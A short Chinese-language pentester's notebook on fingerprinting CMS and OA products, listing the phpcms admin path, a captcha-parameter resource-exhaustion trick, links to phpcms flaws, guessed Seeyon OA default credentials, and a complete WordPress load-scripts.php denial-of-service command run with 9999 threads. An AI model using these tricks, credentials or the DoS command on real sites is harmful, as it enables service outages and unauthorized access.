这几天遇到的一些cms指纹 | 这里记录一下

常见CMS

phpcms

2020-12-20
这个是phpcms管理员的登录页面访问链接/admin.php

图片验证码有个可以指定大小的CC攻击的问题https://www.xxxxxxx.com.cn/api.php?op=checkcode&code_len=4&font_size=2xxx0&width=13xxx0&height=50xxx&font_color=&background=,font_size,width,height同比例扩大即可

robots.txt 里写bangcms

常见漏洞https://blog.csdn.net/qq_39101049/article/details/93735927
注册页面: /index.php?m=member&c=index&a=register&siteid=1]www.xxx.com/index.php?m=member&c=index&a=register&siteid=
sql备份文件泄露:
https://mochazz.github.io/2018/03/09/phpcms_v9_sql%E5%A4%87%E4%BB%BD%E6%96%87%E4%BB%B6%E5%90%8D%E7%88%86%E7%A0%B4/
如果能注册用户的话可以试试这个漏洞PHPCMS v9.6.0 任意用户密码重置 - 羊小弟 - 博客园 (cnblogs.com)

致远OA

2020-12-20
http://xxxx.xxxxx.com.cn/seeyon/main.do
用户名可能长这样 seeyon01 密码 seeyon123456

泛微OA 8

2020-12-20

账号处可能存在用户名枚举漏洞

wordpress

2020-12-20

dos漏洞:
其实手动访问一次这个poc url ,然后用doser 访问主页也行

python doser.py -g 'https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999